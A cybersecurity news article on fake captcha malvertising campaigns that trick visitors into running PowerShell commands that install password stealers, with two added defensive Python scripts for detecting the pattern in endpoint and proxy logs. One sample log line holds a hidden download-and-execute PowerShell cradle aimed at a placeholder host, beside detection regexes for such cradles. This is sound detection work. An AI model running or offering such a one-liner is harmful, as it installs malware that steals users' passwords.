Thursday, May 1, 2025

Beware of Malicious Ads on Captcha Pages that Deliver Password Stealers


Malicious actors have taken cybercrime to new heights by exploiting captcha verification pages, a typically harmless security feature, to launch large-scale malware distribution campaigns.

This startling revelation uncovers how these fake captchas, interlaced with malicious advertising, are infecting users with password-stealing malware.

Over the past several weeks, cybercriminals have been leveraging fake captcha pages to trick users into executing harmful PowerShell commands.


These fake captchas appear as pop-ups on certain websites, replicating the look and feel of legitimate human verification processes.


When users follow the instructions to “prove they’re human,” they inadvertently execute a PowerShell command that installs malware on their systems.

A visitor activating an ad-placement process and the ad network selecting the target creative (good or bad)

This malicious software is designed to steal passwords, financial information, private files, and social media credentials.

The success of this campaign lies in its simplicity and ability to evade user suspicion. The malware execution is hidden within what seems to be a routine process, leaving most victims unaware they’ve been compromised.
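The attack chain described above ends with the victim pasting a PowerShell one-liner into an interactive prompt. The following added example, which is not code from the article or from the researchers it cites, shows the detection logic a defender would run over endpoint telemetry: it scores process or script-block events for download-and-execute indicators and raises the weight when the parent is an interactive shell such as explorer.exe (the Run dialog), which is the distinguishing feature of a paste-and-run infection. The log format, indicator weights, hostnames and the example.invalid domain are all constructed for the example.

```python
"""Added example: score endpoint events for the paste-and-run PowerShell pattern.
Log format, weights and sample events are constructed, not taken from the article."""
import re
from dataclasses import dataclass

# Weighted indicators of a download-and-execute PowerShell one-liner
# (assumed weights; tune against your own baseline).
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("download_cradle", re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("encoded_command", re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
]
# Parents that mean a human typed or pasted the command (Run dialog, Explorer
# address bar) rather than a scheduled task or installer.
INTERACTIVE_PARENTS = {"explorer.exe"}
ALERT_THRESHOLD = 5

# Constructed line format: "<timestamp> host=<name> parent=<image> cmd=<command line>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")


@dataclass
class PsEvent:
    host: str
    parent: str
    command: str


def parse_line(line: str):
    """Parse one constructed log line; returns None for lines that do not match."""
    m = LOG_LINE.match(line.strip())
    return PsEvent(m["host"], m["parent"], m["cmd"]) if m else None


def score_event(ev: PsEvent):
    """Return (score, list of indicator names) for a single event."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(ev.command)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A cradle launched from an interactive shell is the fake-captcha signature:
    # the victim pasted it themselves.
    if hits and ev.parent.lower() in INTERACTIVE_PARENTS:
        hits.append("launched_interactively")
        score += 2
    return score, hits


def analyze(lines):
    """Return an alert record for every event scoring at or above ALERT_THRESHOLD."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev.host, "score": score,
                           "hits": hits, "command": ev.command})
    return alerts


# Constructed sample events (example.invalid is a reserved, non-resolving domain).
SAMPLE_LOG = [
    '2025-05-01T10:00:00Z host=WS01 parent=explorer.exe '
    'cmd=powershell.exe -w hidden -c "iex (irm https://example.invalid/verify)"',
    r'2025-05-01T10:05:00Z host=SRV02 parent=taskeng.exe '
    r'cmd=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    '2025-05-01T10:07:00Z host=WS03 parent=cmd.exe '
    'cmd=powershell.exe -NoProfile -c "Get-Process | Sort-Object CPU"',
    # Filler base64 (UTF-16LE "AAAAAAAAAAAA"), not a real payload.
    '2025-05-01T10:09:00Z host=WS07 parent=explorer.exe '
    'cmd=powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(f"{alert['host']}: score={alert['score']} hits={alert['hits']}")
```

On a real Windows fleet the same scoring would be fed from PowerShell script block logging (Event ID 4104) or Sysmon process-creation events (Event ID 1), where the parent image and full command line are available; the scheduled backup task in the sample scores only 1 because a policy-bypass flag on its own is routine administration, while the two events launched from explorer.exe cross the threshold.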

The Role of Malvertising in the Attack

The distribution of these malicious captchas is facilitated by malvertising or malicious advertising. Cybercriminals purchase ad space on legitimate websites through ad networks, inserting scripts that redirect users to fake captcha pages.

Example of a full fake captcha malvertising attack flow including all services in use

These ads are sophisticated, using advanced cloaking techniques to bypass moderation checks. Once the ad is served, it collects information about the user’s device and browser, determining the best way to deliver the malicious payload.

The system relies on a Traffic Distribution System (TDS), which analyzes the user’s profile and redirects them to the fake captcha page.

This seamless redirection process, often undetectable by end users, ensures the malware campaign operates at scale without raising red flags.
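The redirection path the article describes (ad creative to TDS to fake captcha page) is hard for an end user to see but leaves a trail in web-proxy logs. The following added example, written for this article and not taken from it or from any vendor, rebuilds each client's HTTP redirect chain from recorded 3xx responses and flags chains that pass through several unrelated hosts before landing on a page whose path looks like a human-verification prompt. The log format, hostnames and the keyword list are constructed assumptions.

```python
"""Added example: rebuild HTTP redirect chains from proxy logs and flag TDS-style
funnels that end on a captcha-looking landing page. Log format is constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Constructed line format: "<client> ts=<n> status=<code> url=<url> loc=<Location header or ->"
LOG_LINE = re.compile(
    r"^(?P<client>\S+)\s+ts=(?P<ts>\d+)\s+status=(?P<status>\d+)\s+"
    r"url=(?P<url>\S+)\s+loc=(?P<loc>\S+)$")
# Words that fake "prove you're human" landing pages tend to carry in the path (assumed list).
SUSPICIOUS_LANDING = re.compile(r"captcha|verif|human|robot", re.I)


@dataclass
class Request:
    client: str
    ts: int
    status: int
    url: str
    location: Optional[str]   # Location header recorded for 3xx responses


def parse_log(lines):
    """Parse constructed proxy lines into Request objects, ordered per client by time."""
    out = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            loc = None if m["loc"] == "-" else m["loc"]
            out.append(Request(m["client"], int(m["ts"]), int(m["status"]), m["url"], loc))
    return sorted(out, key=lambda r: (r.client, r.ts))


def build_chains(requests):
    """Follow each client's 3xx Location hops as long as the next URL was actually fetched."""
    by_client = defaultdict(list)
    for r in requests:
        by_client[r.client].append(r)
    chains = []
    for client, reqs in by_client.items():
        redirects = {r.url: r for r in reqs if 300 <= r.status < 400 and r.location}
        targets = {r.location for r in redirects.values()}
        fetched = {r.url for r in reqs}
        for url, head in redirects.items():
            if url in targets:        # mid-chain hop, not a chain head
                continue
            chain, cur = [url], head
            # Stop at the first non-redirect response, unseen URL, or loop.
            while cur is not None and cur.location in fetched and cur.location not in chain:
                chain.append(cur.location)
                cur = redirects.get(cur.location)
            chains.append((client, chain))
    return chains


def suspicious_chains(lines, min_hosts=3):
    """Return chains spanning >= min_hosts hosts that end on a verification-looking page."""
    findings = []
    for client, chain in build_chains(parse_log(lines)):
        hosts = [urlparse(u).netloc for u in chain]
        distinct = len(dict.fromkeys(hosts))
        landing_path = urlparse(chain[-1]).path
        if (distinct >= min_hosts and hosts[0] != hosts[-1]
                and SUSPICIOUS_LANDING.search(landing_path)):
            findings.append({"client": client, "hops": distinct, "chain": chain})
    return findings


# Constructed sample traffic: one client is funnelled ad -> TDS -> tracker -> fake captcha,
# another follows an ordinary two-hop login redirect.
SAMPLE_LOG = [
    "10.0.0.5 ts=100 status=200 url=https://free-streams.example/watch/123 loc=-",
    "10.0.0.5 ts=101 status=302 url=https://adnet.example/serve?z=42 loc=https://tds-hop.example/go?s=7",
    "10.0.0.5 ts=101 status=302 url=https://tds-hop.example/go?s=7 loc=https://track.example/c?id=9",
    "10.0.0.5 ts=102 status=302 url=https://track.example/c?id=9 loc=https://verify-human.example/captcha.html",
    "10.0.0.5 ts=102 status=200 url=https://verify-human.example/captcha.html loc=-",
    "10.0.0.9 ts=200 status=302 url=https://shop.example/login loc=https://auth.shop.example/sso",
    "10.0.0.9 ts=201 status=200 url=https://auth.shop.example/sso loc=-",
]

if __name__ == "__main__":
    for f in suspicious_chains(SAMPLE_LOG):
        print(f"{f['client']}: {f['hops']} hosts -> {' -> '.join(f['chain'])}")
```

Chaining on recorded Location headers is deliberate: browsers keep the original Referer across a 302, so Referer-based reconstruction misses the TDS hops, whereas the proxy sees every redirect it served. JavaScript or meta-refresh redirects do not produce 3xx responses and would need the same logic applied to page-load sequences instead.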

Monetag and the Ecosystem of Malicious Ads

A notable player in this campaign is Monetag, an ad network accused of enabling malicious advertising.

A real example of powerful SEO – First Google Search results pointing to a Monetag-enabled site

Unfortunately, malicious actors have exploited the network's advertising tools to serve fake captcha pages. By routing their campaigns through ad tracking services like BeMob to disguise their intent, attackers bypass Monetag's content moderation, making it difficult to detect and remove harmful ads.

Monetag’s TDS domains direct link to Android/Desktop adware as well as Propeller-Ads infra

The attackers frequently update their malware scripts and captcha designs to evade detection, ensuring the campaign remains effective.

Reports indicate that these campaigns generate over one million ad impressions per day, affecting thousands of legitimate websites.

This campaign primarily targets users visiting websites offering free or pirated content, such as streaming platforms and download hubs. These sites, known for aggressive advertising practices, become unwitting participants in the attack.

In some cases, compromised websites or cloned templates are used to spread these fake captcha scripts further, increasing the scale of the infection.

Malware dropping

According to the Labs Guard report on Medium, sophisticated search engine optimization (SEO) tactics ensure these malicious websites rank highly in search results, attracting a steady stream of unsuspecting visitors.

Once on the site, users are funneled into the fake captcha attack flow through intrusive ad placements.

To safeguard against these threats, users must adopt proactive security practices. Avoid clicking on pop-ups or captcha prompts that seem suspicious or lead to unexpected actions.

Using reputable ad blockers can minimize exposure to malvertising, while keeping your operating system and antivirus software updated can help detect and prevent malware execution.

Finally, stay vigilant when browsing high-risk websites, especially those offering free or pirated content.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
